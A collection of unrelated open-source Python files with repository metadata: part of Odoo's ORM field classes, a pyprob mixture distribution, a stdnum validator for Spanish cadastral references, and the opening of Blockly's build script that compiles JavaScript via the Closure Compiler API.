selection = api.expected(api.model, selection)
super(Selection, self).__init__(selection=selection, string=string, **kwargs)
def _setup(self, env):
super(Selection, self)._setup(env)
assert self.selection is not None, "Field %s without selection" % self
def _setup_related(self, env):
super(Selection, self)._setup_related(env)
# selection must be computed on related field
field = self.related_field
self.selection = lambda model: field._description_selection(model.env)
def set_class_name(self, cls, name):
super(Selection, self).set_class_name(cls, name)
# determine selection (applying 'selection_add' extensions)
selection = None
for field in resolve_all_mro(cls, name, reverse=True):
if isinstance(field, type(self)):
# We cannot use field.selection or field.selection_add here
# because those attributes are overridden by `set_class_name`.
if 'selection' in field._attrs:
selection = field._attrs['selection']
if 'selection_add' in field._attrs:
selection = selection + field._attrs['selection_add']
else:
selection = None
self.selection = selection
def _description_selection(self, env):
""" return the selection list (pairs (value, label)); labels are
translated according to context language
"""
selection = self.selection
if isinstance(selection, basestring):
return getattr(env[self.model_name], selection)()
if callable(selection):
return selection(env[self.model_name])
# translate selection labels
if env.lang:
name = "%s,%s" % (self.model_name, self.name)
translate = partial(
env['ir.translation']._get_source, name, 'selection', env.lang)
return [(value, translate(label) if label else label) for value, label in selection]
else:
return selection
@property
def _column_selection(self):
if isinstance(self.selection, basestring):
method = self.selection
return lambda self, *a, **kw: getattr(self, method)(*a, **kw)
else:
return self.selection
def get_values(self, env):
""" return a list of the possible values """
selection = self.selection
if isinstance(selection, basestring):
selection = getattr(env[self.model_name], selection)()
elif callable(selection):
selection = selection(env[self.model_name])
return [value for value, _ in selection]
def convert_to_cache(self, value, record, validate=True):
if not validate:
return value or False
if value in self.get_values(record.env):
return value
elif not value:
return False
raise ValueError("Wrong value for %s: %r" % (self, value))
def convert_to_export(self, value, env):
if not isinstance(self.selection, list):
# FIXME: this reproduces an existing buggy behavior!
return value
for item in self._description_selection(env):
if item[0] == value:
return item[1]
return False
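# Sketch of a declaration, and of an extension in an override (illustrative):
# state = Selection([('draft', 'Draft'), ('done', 'Done')], string='Status')
# state = Selection(selection_add=[('cancel', 'Cancelled')])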
class Reference(Selection):
type = 'reference'
size = None
def __init__(self, selection=None, string=None, **kwargs):
super(Reference, self).__init__(selection=selection, string=string, **kwargs)
def _setup(self, env):
super(Reference, self)._setup(env)
assert isinstance(self.size, (NoneType, int)), \
"Reference field %s with non-integer size %r" % (self, self.size)
_related_size = property(attrgetter('size'))
_column_size = property(attrgetter('size'))
def convert_to_cache(self, value, record, validate=True):
if isinstance(value, BaseModel):
if ((not validate or value._name in self.get_values(record.env))
and len(value) <= 1):
return value.with_env(record.env) or False
elif isinstance(value, basestring):
res_model, res_id = value.split(',')
return record.env[res_model].browse(int(res_id))
elif not value:
return False
raise ValueError("Wrong value for %s: %r" % (self, value))
def convert_to_read(self, value, use_name_get=True):
return "%s,%s" % (value._name, value.id) if value else False
def convert_to_export(self, value, env):
return bool(value) and value.name_get()[0][1]
def convert_to_display_name(self, value):
return ustr(value and value.display_name)
class _Relational(Field):
""" Abstract class for relational fields. """
relational = True
domain = None # domain for searching values
context = None # context for searching values
def _setup(self, env):
super(_Relational, self)._setup(env)
if self.comodel_name not in env.registry:
_logger.warning("Field %s with unknown comodel_name %r"
% (self, self.comodel_name))
self.comodel_name = '_unknown'
@property
def _related_domain(self):
if callable(self.domain):
# will be called with another model than self's
return lambda recs: self.domain(recs.env[self.model_name])
else:
# maybe not correct if domain is a string...
return self.domain
_related_context = property(attrgetter('context'))
_description_relation = property(attrgetter('comodel_name'))
_description_context = property(attrgetter('context'))
def _description_domain(self, env):
return self.domain(env[self.model_name]) if callable(self.domain) else self.domain
_column_obj = property(attrgetter('comodel_name'))
_column_domain = property(attrgetter('domain'))
_column_context = property(attrgetter('context'))
def null(self, env):
return env[self.comodel_name]
def modified(self, records):
# Invalidate cache for self.inverse_fields, too. Note that recomputation
# of fields that depend on self.inverse_fields is already covered by the
# triggers (see above).
spec = super(_Relational, self).modified(records)
for invf in self.inverse_fields:
spec.append((invf, None))
return spec
class Many2one(_Relational):
""" The value of such a field is a recordset of size 0 (no
record) or 1 (a single record).
:param comodel_name: name of the target model (string)
:param domain: an optional domain to set on candidate values on the
client side (domain or string)
:param context: an optional context to use on the client side when
handling that field (dictionary)
:param ondelete: what to do when the referred record is deleted;
possible values are: ``'set null'``, ``'restrict'``, ``'cascade'``
:param auto_join: whether JOINs are generated upon search through that
field (boolean, by default ``False``)
:param delegate: set it to ``True`` to make fields of the target model
accessible from the current model (corresponds to ``_inherits``)
The attribute `comodel_name` is mandatory except in the case of related
fields or field extensions.
"""
type = 'many2one'
ondelete = 'set null' # what to do when value is deleted
auto_join = False # whether joins are generated upon search
delegate = False # whether self implements delegation
def __init__(self, comodel_name=None, string=None, **kwargs):
super(Many2one, self).__init__(comodel_name=comodel_name, string=string, **kwargs)
def set_class_name(self, cls, name):
super(Many2one, self).set_class_name(cls, name)
# determine self.delegate
if not self.delegate:
self.delegate = name in cls._inherits.values()
_column_ondelete = property(attrgetter('ondelete'))
_column_auto_join = property(attrgetter('auto_join'))
def _update(self, records, value):
""" Update the cached value of `self` for `records` with `value`. """
records._cache[self] = value
def convert_to_cache(self, value, record, validate=True):
if isinstance(value, (NoneType, int, long)):
return record.env[self.comodel_name].browse(value)
if isinstance(value, BaseModel):
if value._name == self.comodel_name and len(value) <= 1:
return value.with_env(record.env)
raise ValueError("Wrong value for %s: %r" % (self, value))
elif isinstance(value, tuple):
return record.env[self.comodel_name].browse(value[0])
elif isinstance(value, dict):
return record.env[self.comodel_name].new(value)
else:
return self.null(record.env)
def convert_to_read(self, value, use_name_get=True):
if use_name_get and value:
# evaluate name_get() as superuser, because the visibility of a
# many2one field value (id and name) depends on the current record's
# access rights, and not the value's access rights.
try:
return value.sudo().name_get()[0]
except MissingError:
# Should not happen, unless the foreign key is missing.
return False
else:
return value.id
def convert_to_write(self, value, target=None, fnames=None):
return value.id
def convert_to_onchange(self, value):
return value.id
def convert_to_export(self, value, env):
return bool(value) and value.name_get()[0][1]
def convert_to_display_name(self, value):
return ustr(value.display_name)
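# Sketch of a typical declaration (illustrative model and values):
# partner_id = Many2one('res.partner', string='Partner', ondelete='restrict')
# The cached value is a recordset of size 0 or 1; convert_to_read() above
# turns it into an (id, display_name) pair for the client.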
class UnionUpdate(SpecialValue):
""" Placeholder for a value update; when this value is taken from the cache,
it returns ``record[field.name] | value`` and stores it in the cache.
"""
def __init__(self, field, record, value):
self.args = (field, record, value)
def get(self):
field, record, value = self.args
# in order to read the current field's value, remove self from cache
del record._cache[field]
# read the current field's value, and update it in cache only
record._cache[field] = new_value = record[field.name] | value
return new_value
class _RelationalMulti(_Relational):
""" Abstract class for relational fields *2many. """
def _update(self, records, value):
""" Update the cached value of `self` for `records` with `value`. """
for record in records:
if self in record._cache:
record._cache[self] = record[self.name] | value
else:
record._cache[self] = UnionUpdate(self, record, value)
def convert_to_cache(self, value, record, validate=True):
if isinstance(value, BaseModel):
if value._name == self.comodel_name:
return value.with_env(record.env)
elif isinstance(value, list):
# value is a list of record ids or commands
if not record.id:
record = record.browse() # new record has no value
result = record[self.name]
# modify result with the commands;
# beware to not introduce duplicates in result
for command in value:
if isinstance(command, (tuple, list)):
if command[0] == 0:
result += result.new(command[2])
elif command[0] == 1:
result.browse(command[1]).update(command[2])
result += result.browse(command[1]) - result
elif command[0] == 2:
# note: the record will be deleted by write()
result -= result.browse(command[1])
elif command[0] == 3:
result -= result.browse(command[1])
elif command[0] == 4:
result += result.browse(command[1]) - result
elif command[0] == 5:
result = result.browse()
elif command[0] == 6:
result = result.browse(command[2])
elif isinstance(command, dict):
result += result.new(command)
else:
result += result.browse(command) - result
return result
elif not value:
return self.null(record.env)
raise ValueError("Wrong value for %s: %s" % (self, value))
def convert_to_read(self, value, use_name_get=True):
return value.ids
def convert_to_write(self, value, target=None, fnames=None):
# remove/delete former records
if target is None:
set_ids = []
result = [(6, 0, set_ids)]
add_existing = lambda id: set_ids.append(id)
else:
tag = 2 if self.type == 'one2many' else 3
result = [(tag, record.id) for record in target[self.name] - value]
add_existing = lambda id: result.append((4, id))
if fnames is None:
# take all fields in cache, except the inverses of self
fnames = set(value._fields) - set(MAGIC_COLUMNS)
for invf in self.inverse_fields:
fnames.discard(invf.name)
# add new and existing records
for record in value:
if not record.id:
values = {k: v for k, v in record._cache.iteritems() if k in fnames}
values = record._convert_to_write(values)
result.append((0, 0, values))
elif record._is_dirty():
values = {k: record._cache[k] for k in record._get_dirty() if k in fnames}
values = record._convert_to_write(values)
result.append((1, record.id, values))
else:
add_existing(record.id)
return result
def convert_to_export(self, value, env):
return bool(value) and ','.join(name for id, name in value.name_get())
def convert_to_display_name(self, value):
raise NotImplementedError()
def _compute_related(self, records):
""" Compute the related field `self` on `records`. """
for record in records:
value = record
# traverse the intermediate fields, and keep at most one record
for name in self.related[:-1]:
value = value[name][:1]
record[self.name] = value[self.related[-1]]
class One2many(_RelationalMulti):
""" One2many field; the value of such a field is the recordset of all the
records in `comodel_name` such that the field `inverse_name` is equal to
the current record.
:param comodel_name: name of the target model (string)
:param inverse_name: name of the inverse `Many2one` field in
`comodel_name` (string)
:param domain: an optional domain to set on candidate values on the
client side (domain or string)
:param context: an optional context to use on the client side when
handling that field (dictionary)
:param auto_join: whether JOINs are generated upon search through that
field (boolean, by default ``False``)
:param limit: optional limit to use upon read (integer)
The attributes `comodel_name` and `inverse_name` are mandatory except in
the case of related fields or field extensions.
"""
type = 'one2many'
inverse_name = None # name of the inverse field
auto_join = False # whether joins are generated upon search
limit = None # optional limit to use upon read
copy = False # o2m are not copied by default
def __init__(self, comodel_name=None, inverse_name=None, string=None, **kwargs):
super(One2many, self).__init__(
comodel_name=comodel_name,
inverse_name=inverse_name,
string=string,
**kwargs
)
def _setup_regular(self, env):
super(One2many, self)._setup_regular(env)
if self.inverse_name:
# link self to its inverse field and vice-versa
comodel = env[self.comodel_name]
comodel._setup_fields()
invf = comodel._fields[self.inverse_name]
# In some rare cases, a `One2many` field can link to an `Integer` field
# (res_model/res_id pattern). Only set up the inverse link if the field
# is actually a `Many2one`.
if isinstance(invf, Many2one):
self.inverse_fields.append(invf)
invf.inverse_fields.append(self)
_description_relation_field = property(attrgetter('inverse_name'))
_column_fields_id = property(attrgetter('inverse_name'))
_column_auto_join = property(attrgetter('auto_join'))
_column_limit = property(attrgetter('limit'))
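# Sketch of an inverse pair of declarations (illustrative model names);
# _setup_regular() above links the two fields as inverses of each other:
# line_ids = One2many('order.line', 'order_id') # on the order model
# order_id = Many2one('order') # on the order.line model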
class Many2many(_RelationalMulti):
""" Many2many field; the value of such a field is the recordset.
:param comodel_name: name of the target model (string)
The attribute `comodel_name` is mandatory except in the case of related
fields or field extensions.
:param relation: optional name of the table that stores the relation in
the database (string)
:param column1: optional name of the column referring to "these" records
in the table `relation` (string)
:param column2: optional name of the column referring to "those" records
in the table `relation` (string)
The attributes `relation`, `column1` and `column2` are optional. If not
given, names are automatically generated from model names, provided
`model_name` and `comodel_name` are different!
:param domain: an optional domain to set on candidate values on the
client side (domain or string)
:param context: an optional context to use on the client side when
handling that field (dictionary)
:param limit: optional limit to use upon read (integer)
"""
type = 'many2many'
relation = None # name of table
column1 = None # column of table referring to model
column2 = None # column of table referring to comodel
limit = None # optional limit to use upon read
def __init__(self, comodel_name=None, relation=None, column1=None, column2=None,
string=None, **kwargs):
super(Many2many, self).__init__(
comodel_name=comodel_name,
relation=relation,
column1=column1,
column2=column2,
string=string,
**kwargs
)
def _setup_regular(self, env):
super(Many2many, self)._setup_regular(env)
if not self.relation:
if isinstance(self.column, fields.many2many):
self.relation, self.column1, self.column2 = \
self.column._sql_names(env[self.model_name])
if self.relation:
m2m = env.registry._m2m
# if inverse field has already been setup, it is present in m2m
invf = m2m.get((self.relation, self.column2, self.column1))
if invf:
self.inverse_fields.append(invf)
invf.inverse_fields.append(self)
else:
# add self in m2m, so that its inverse field can find it
m2m[(self.relation, self.column1, self.column2)] = self
_column_rel = property(attrgetter('relation'))
_column_id1 = property(attrgetter('column1'))
_column_id2 = property(attrgetter('column2'))
_column_limit = property(attrgetter('limit'))
class Id(Field):
""" Special case for field 'id'. """
store = True
#: Can't write this!
readonly = True
def __init__(self, string=None, **kwargs):
super(Id, self).__init__(type='integer', string=string, **kwargs)
def to_column(self):
self.column = fields.integer('ID')
return self.column
def __get__(self, record, owner):
if record is None:
return self # the field is accessed through the class owner
if not record:
return False
return record.ensure_one()._ids[0]
def __set__(self, record, value):
raise TypeError("field 'id' cannot be assigned")
# imported here to avoid dependency cycle issues
from openerp import SUPERUSER_ID
from .exceptions import Warning, AccessError, MissingError
from .models import BaseModel, MAGIC_COLUMNS
from .osv import fields
| Codefans-fan/odoo | openerp/fields.py | Python | agpl-3.0 | 70,820 | 0.001525 |
import torch
from . import Distribution, Categorical
from .. import util
class Mixture(Distribution):
def __init__(self, distributions, probs=None):
self._distributions = distributions
self.length = len(distributions)
if probs is None:
self._probs = util.to_tensor(torch.zeros(self.length)).fill_(1./self.length)
else:
self._probs = util.to_tensor(probs)
self._probs = self._probs / self._probs.sum(-1, keepdim=True)
self._log_probs = torch.log(util.clamp_probs(self._probs))
event_shape = torch.Size()
if self._probs.dim() == 1:
batch_shape = torch.Size()
self._batch_length = 0
elif self._probs.dim() == 2:
batch_shape = torch.Size([self._probs.size(0)])
self._batch_length = self._probs.size(0)
else:
raise ValueError('Expecting 1d or 2d (batched) mixture probabilities.')
self._mixing_dist = Categorical(self._probs)
self._mean = None
self._variance = None
super().__init__(name='Mixture', address_suffix='Mixture({})'.format(', '.join([d._address_suffix for d in self._distributions])), batch_shape=batch_shape, event_shape=event_shape)
def __repr__(self):
return 'Mixture(distributions:({}), probs:{})'.format(', '.join([repr(d) for d in self._distributions]), self._probs)
def __len__(self):
return self.length
def log_prob(self, value, sum=False):
if self._batch_length == 0:
value = util.to_tensor(value).squeeze()
lp = torch.logsumexp(self._log_probs + util.to_tensor([d.log_prob(value) for d in self._distributions]), dim=0)
else:
value = util.to_tensor(value).view(self._batch_length)
lp = torch.logsumexp(self._log_probs + torch.stack([d.log_prob(value).squeeze(-1) for d in self._distributions]).view(-1, self._batch_length).t(), dim=1)
return torch.sum(lp) if sum else lp
def sample(self):
if self._batch_length == 0:
i = int(self._mixing_dist.sample())
return self._distributions[i].sample()
else:
indices = self._mixing_dist.sample()
dist_samples = []
for d in self._distributions:
sample = d.sample()
if sample.dim() == 0:
sample = sample.unsqueeze(-1)
dist_samples.append(sample)
ret = []
for b in range(self._batch_length):
i = int(indices[b])
ret.append(dist_samples[i][b])
return util.to_tensor(ret)
@property
def mean(self):
if self._mean is None:
means = torch.stack([d.mean for d in self._distributions])
if self._batch_length == 0:
self._mean = torch.dot(self._probs, means)
else:
self._mean = torch.diag(torch.mm(self._probs, means))
return self._mean
@property
def variance(self):
if self._variance is None:
variances = torch.stack([(d.mean - self.mean).pow(2) + d.variance for d in self._distributions])
if self._batch_length == 0:
self._variance = torch.dot(self._probs, variances)
else:
self._variance = torch.diag(torch.mm(self._probs, variances))
return self._variance
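# Minimal usage sketch (assumes a Normal distribution class from the same
# package; log_prob computes logsumexp_i(log w_i + log p_i(x))):
# m = Mixture([Normal(0., 1.), Normal(5., 1.)], probs=[0.3, 0.7])
# x = m.sample()
# lp = m.log_prob(x)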
| probprog/pyprob | pyprob/distributions/mixture.py | Python | bsd-2-clause | 3,418 | 0.002048 |
# referenciacatastral.py - functions for handling Spanish real estate ids
# coding: utf-8
#
# Copyright (C) 2016 David García Garzón
# Copyright (C) 2016-2017 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""Referencia Catastral (Spanish real estate property id)
The cadastral reference code is an identifier for real estate in Spain. It is
issued by Dirección General del Catastro (General Directorate of Land
Registry) of the Ministerio de Hacienda (Treasury Ministry).
It is 20 characters long and contains numbers and letters, including the
Spanish Ñ. The number consists of 14 characters for the parcel, 4 for
identifying properties within the parcel, and 2 check characters. The parcel
part is structured differently for urban, non-urban or special
(infrastructure) cases.
More information:
* http://www.catastro.meh.es/esp/referencia_catastral_1.asp (Spanish)
* http://www.catastro.meh.es/documentos/05042010_P.pdf (Spanish)
* https://es.wikipedia.org/wiki/Catastro#Referencia_catastral
>>> validate('7837301-VG8173B-0001 TT') # Lanteira town hall
'7837301VG8173B0001TT'
>>> validate('783301 VG8173B 0001 TT') # missing digit
Traceback (most recent call last):
...
InvalidLength: ...
>>> validate('7837301/VG8173B 0001 TT') # not alphanumeric
Traceback (most recent call last):
...
InvalidFormat: ...
>>> validate('7837301 VG8173B 0001 NN') # bad check digits
Traceback (most recent call last):
...
InvalidChecksum: ...
>>> format('4A08169P03PRAT0001LR') # BCN Airport
'4A08169 P03PRAT 0001 LR'
"""
from stdnum.exceptions import *
from stdnum.util import clean
alphabet = u'ABCDEFGHIJKLMNÑOPQRSTUVWXYZ0123456789'
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
return clean(number, ' -').strip().upper()
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return ' '.join([
number[:7],
number[7:14],
number[14:18],
number[18:]
])
# The check digit implementation is based on the Javascript
# implementation by Vicente Sancho that can be found at
# http://trellat.es/validar-la-referencia-catastral-en-javascript/
def _check_digit(number):
"""Calculate a single check digit on the provided part of the number."""
weights = (13, 15, 12, 5, 4, 17, 9, 21, 3, 7, 1)
s = sum(w * (int(n) if n.isdigit() else alphabet.find(n) + 1)
for w, n in zip(weights, number))
return 'MQWERTYUIOPASDFGHJKLBZX'[s % 23]
def _force_unicode(number):
"""Convert the number to unicode."""
if not hasattr(number, 'isnumeric'): # pragma: no cover (Python 2 code)
number = number.decode('utf-8')
return number
def calc_check_digits(number):
"""Calculate the check digits for the number."""
number = _force_unicode(compact(number))
return (
_check_digit(number[0:7] + number[14:18]) +
_check_digit(number[7:14] + number[14:18]))
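# For example, consistent with the module doctests above:
# calc_check_digits('7837301VG8173B0001') # -> 'TT'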
def validate(number):
"""Checks to see if the number provided is a valid Cadastral Reference.
This checks the length, formatting and check digits."""
number = compact(number)
n = _force_unicode(number)
if not all(c in alphabet for c in n):
raise InvalidFormat()
if len(n) != 20:
raise InvalidLength()
if calc_check_digits(n) != n[18:]:
raise InvalidChecksum()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid Cadastral Reference."""
try:
return bool(validate(number))
except ValidationError:
return False
| holvi/python-stdnum | stdnum/es/referenciacatastral.py | Python | lgpl-2.1 | 4,360 | 0 |
#!/usr/bin/python2.7
# Compresses the core Blockly files into a single JavaScript file.
#
# Copyright 2012 Google Inc.
# https://developers.google.com/blockly/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script generates two versions of Blockly's core files:
# blockly_compressed.js
# blockly_uncompressed.js
# The compressed file is a concatenation of all of Blockly's core files which
# have been run through Google's Closure Compiler. This is done using the
# online API (which takes a few seconds and requires an Internet connection).
# The uncompressed file is a script that loads in each of Blockly's core files
# one by one. This takes much longer for a browser to load, but is useful
# when debugging code since line numbers are meaningful and variables haven't
# been renamed. The uncompressed file also allows for a faster developement
# cycle since there is no need to rebuild or recompile, just reload.
#
# This script also generates:
# blocks_compressed.js: The compressed common blocks.
# blocks_horizontal_compressed.js: The compressed Scratch horizontal blocks.
# blocks_vertical_compressed.js: The compressed Scratch vertical blocks.
# msg/js/<LANG>.js for every language <LANG> defined in msg/js/<LANG>.json.
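# Typical invocation, from the repository root (assumes the Closure library
# is checked out as a sibling directory; see the check in __main__ below):
# python build.py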
from __future__ import print_function
import sys
if sys.version_info[0] != 2:
raise Exception("Blockly build only compatible with Python 2.x.\n"
"You are using: " + sys.version)
import errno, glob, httplib, json, os, re, subprocess, threading, urllib
def import_path(fullpath):
"""Import a file with full path specification.
Allows one to import from any directory, something __import__ does not do.
Args:
fullpath: Path and filename of import.
Returns:
An imported module.
"""
path, filename = os.path.split(fullpath)
filename, ext = os.path.splitext(filename)
sys.path.append(path)
module = __import__(filename)
reload(module) # Might be out of date.
del sys.path[-1]
return module
HEADER = ("// Do not edit this file; automatically generated by build.py.\n"
"'use strict';\n")
class Gen_uncompressed(threading.Thread):
"""Generate a JavaScript file that loads Blockly's raw files.
Runs in a separate thread.
"""
def __init__(self, search_paths, vertical):
threading.Thread.__init__(self)
self.search_paths = search_paths
self.vertical = vertical
def run(self):
if self.vertical:
target_filename = 'blockly_uncompressed_vertical.js'
else:
target_filename = 'blockly_uncompressed_horizontal.js'
f = open(target_filename, 'w')
f.write(HEADER)
f.write("""
var isNodeJS = !!(typeof module !== 'undefined' && module.exports &&
typeof window === 'undefined');
if (isNodeJS) {
var window = {};
require('../closure-library/closure/goog/bootstrap/nodejs');
}
window.BLOCKLY_DIR = (function() {
if (!isNodeJS) {
// Find name of current directory.
var scripts = document.getElementsByTagName('script');
var re = new RegExp('(.+)[\/]blockly_uncompressed(_vertical|_horizontal|)\.js$');
for (var i = 0, script; script = scripts[i]; i++) {
var match = re.exec(script.src);
if (match) {
return match[1];
}
}
alert('Could not detect Blockly\\'s directory name.');
}
return '';
})();
window.BLOCKLY_BOOT = function() {
var dir = '';
if (isNodeJS) {
require('../closure-library/closure/goog/bootstrap/nodejs');
dir = 'blockly';
} else {
// Execute after Closure has loaded.
if (!window.goog) {
alert('Error: Closure not found. Read this:\\n' +
'developers.google.com/blockly/guides/modify/web/closure');
}
dir = window.BLOCKLY_DIR.match(/[^\\/]+$/)[0];
}
""")
add_dependency = []
base_path = calcdeps.FindClosureBasePath(self.search_paths)
for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths):
add_dependency.append(calcdeps.GetDepsLine(dep, base_path))
add_dependency = '\n'.join(add_dependency)
# Find the Blockly directory name and replace it with a JS variable.
# This allows blockly_uncompressed.js to be compiled on one computer and be
# used on another, even if the directory name differs.
m = re.search('[\\/]([^\\/]+)[\\/]core[\\/]blockly.js', add_dependency)
add_dependency = re.sub('([\\/])' + re.escape(m.group(1)) +
'([\\/]core[\\/])', '\\1" + dir + "\\2', add_dependency)
f.write(add_dependency + '\n')
provides = []
for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths):
if not dep.filename.startswith(os.pardir + os.sep): # '../'
provides.extend(dep.provides)
provides.sort()
f.write('\n')
f.write('// Load Blockly.\n')
for provide in provides:
f.write("goog.require('%s');\n" % provide)
f.write("""
delete this.BLOCKLY_DIR;
delete this.BLOCKLY_BOOT;
};
if (isNodeJS) {
window.BLOCKLY_BOOT()
module.exports = Blockly;
} else {
// Delete any existing Closure (e.g. Soy's nogoog_shim).
document.write('<script>var goog = undefined;</script>');
// Load fresh Closure Library.
document.write('<script src="' + window.BLOCKLY_DIR +
'/../closure-library/closure/goog/base.js"></script>');
document.write('<script>window.BLOCKLY_BOOT();</script>');
}
""")
f.close()
print("SUCCESS: " + target_filename)
class Gen_compressed(threading.Thread):
"""Generate a JavaScript file that contains all of Blockly's core and all
required parts of Closure, compiled together.
Uses the Closure Compiler's online API.
Runs in a separate thread.
"""
def __init__(self, search_paths_vertical, search_paths_horizontal):
threading.Thread.__init__(self)
self.search_paths_vertical = search_paths_vertical
self.search_paths_horizontal = search_paths_horizontal
def run(self):
self.gen_core(True)
self.gen_core(False)
self.gen_blocks("horizontal")
self.gen_blocks("vertical")
self.gen_blocks("common")
self.gen_generator("arduino")
def gen_core(self, vertical):
if vertical:
target_filename = 'blockly_compressed_vertical.js'
search_paths = self.search_paths_vertical
else:
target_filename = 'blockly_compressed_horizontal.js'
search_paths = self.search_paths_horizontal
# Define the parameters for the POST request.
params = [
("compilation_level", "SIMPLE_OPTIMIZATIONS"),
("use_closure_library", "true"),
("output_format", "json"),
("output_info", "compiled_code"),
("output_info", "warnings"),
("output_info", "errors"),
("output_info", "statistics"),
]
# Read in all the source files.
filenames = calcdeps.CalculateDependencies(search_paths,
[os.path.join("core", "blockly.js")])
for filename in filenames:
# Filter out the Closure files (the compiler will add them).
if filename.startswith(os.pardir + os.sep): # '../'
continue
f = open(filename)
params.append(("js_code", "".join(f.readlines())))
f.close()
self.do_compile(params, target_filename, filenames, "")
def gen_blocks(self, block_type):
if block_type == "horizontal":
target_filename = "blocks_compressed_horizontal.js"
filenames = glob.glob(os.path.join("blocks_horizontal", "*.js"))
elif block_type == "vertical":
target_filename = "blocks_compressed_vertical.js"
filenames = glob.glob(os.path.join("blocks_vertical", "*.js"))
elif block_type == "common":
target_filename = "blocks_compressed.js"
filenames = glob.glob(os.path.join("blocks_common", "*.js"))
# Define the parameters for the POST request.
params = [
("compilation_level", "SIMPLE_OPTIMIZATIONS"),
("output_format", "json"),
("output_info", "compiled_code"),
("output_info", "warnings"),
("output_info", "errors"),
("output_info", "statistics"),
]
# Read in all the source files.
# Add Blockly.Blocks to be compatible with the compiler.
params.append(("js_code", "goog.provide('Blockly.Blocks');"))
# Add Blockly.Colours for use of centralized colour bank
filenames.append(os.path.join("core", "colours.js"))
filenames.append(os.path.join("core", "constants.js"))
for filename in filenames:
f = open(filename)
params.append(("js_code", "".join(f.readlines())))
f.close()
# Remove Blockly.Blocks to be compatible with Blockly.
remove = "var Blockly={Blocks:{}};"
self.do_compile(params, target_filename, filenames, remove)
def gen_generator(self, language):
target_filename = language + "_compressed.js"
# Define the parameters for the POST request.
params = [
("compilation_level", "SIMPLE_OPTIMIZATIONS"),
("output_format", "json"),
("output_info", "compiled_code"),
("output_info", "warnings"),
("output_info", "errors"),
("output_info", "statistics"),
]
# Read in all the source files.
# Add Blockly.Generator to be compatible with the compiler.
params.append(("js_code", "goog.provide('Blockly.Generator');"))
filenames = glob.glob(
os.path.join("generators", language, "*.js"))
filenames.insert(0, os.path.join("generators", language + ".js"))
for filename in filenames:
f = open(filename)
params.append(("js_code", "".join(f.readlines())))
f.close()
filenames.insert(0, "[goog.provide]")
# Remove Blockly.Generator to be compatible with Blockly.
remove = "var Blockly={Generator:{}};"
self.do_compile(params, target_filename, filenames, remove)
def do_compile(self, params, target_filename, filenames, remove):
# Send the request to Google.
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPConnection("closure-compiler.appspot.com")
conn.request("POST", "/compile", urllib.urlencode(params), headers)
response = conn.getresponse()
json_str = response.read()
conn.close()
# Parse the JSON response.
json_data = json.loads(json_str)
def file_lookup(name):
if not name.startswith("Input_"):
return "???"
n = int(name[6:]) - 1
return filenames[n]
if json_data.has_key("serverErrors"):
errors = json_data["serverErrors"]
for error in errors:
print("SERVER ERROR: %s" % target_filename)
print(error["error"])
elif json_data.has_key("errors"):
errors = json_data["errors"]
for error in errors:
print("FATAL ERROR")
print(error["error"])
if error["file"]:
print("%s at line %d:" % (
file_lookup(error["file"]), error["lineno"]))
print(error["line"])
print((" " * error["charno"]) + "^")
sys.exit(1)
else:
if json_data.has_key("warnings"):
warnings = json_data["warnings"]
for warning in warnings:
print("WARNING")
print(warning["warning"])
if warning["file"]:
print("%s at line %d:" % (
file_lookup(warning["file"]), warning["lineno"]))
print(warning["line"])
print((" " * warning["charno"]) + "^")
print()
if not json_data.has_key("compiledCode"):
print("FATAL ERROR: Compiler did not return compiledCode.")
sys.exit(1)
code = HEADER + "\n" + json_data["compiledCode"]
code = code.replace(remove, "")
# Trim down Google's Apache licences.
# The Closure Compiler used to preserve these until August 2015.
# Delete this in a few months if the licences don't return.
LICENSE = re.compile("""/\\*
[\w ]+
(Copyright \\d+ Google Inc.)
https://developers.google.com/blockly/
Licensed under the Apache License, Version 2.0 \(the "License"\);
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
\\*/""")
code = re.sub(LICENSE, r"\n// \1 Apache License 2.0", code)
stats = json_data["statistics"]
original_b = stats["originalSize"]
compressed_b = stats["compressedSize"]
if original_b > 0 and compressed_b > 0:
f = open(target_filename, "w")
f.write(code)
f.close()
original_kb = int(original_b / 1024 + 0.5)
compressed_kb = int(compressed_b / 1024 + 0.5)
ratio = int(float(compressed_b) / float(original_b) * 100 + 0.5)
print("SUCCESS: " + target_filename)
print("Size changed from %d KB to %d KB (%d%%)." % (
original_kb, compressed_kb, ratio))
else:
print("UNKNOWN ERROR")
class Gen_langfiles(threading.Thread):
"""Generate JavaScript file for each natural language supported.
Runs in a separate thread.
"""
def __init__(self):
threading.Thread.__init__(self)
def _rebuild(self, srcs, dests):
# Determine whether any of the files in srcs is newer than any in dests.
try:
return (max(os.path.getmtime(src) for src in srcs) >
min(os.path.getmtime(dest) for dest in dests))
except OSError as e:
# Was a file not found?
if e.errno == errno.ENOENT:
# If it was a source file, we can't proceed.
if e.filename in srcs:
print("Source file missing: " + e.filename)
sys.exit(1)
else:
# If a destination file was missing, rebuild.
return True
else:
print("Error checking file creation times: " + e)
def run(self):
# The files msg/json/{en,qqq,synonyms}.json depend on msg/messages.js.
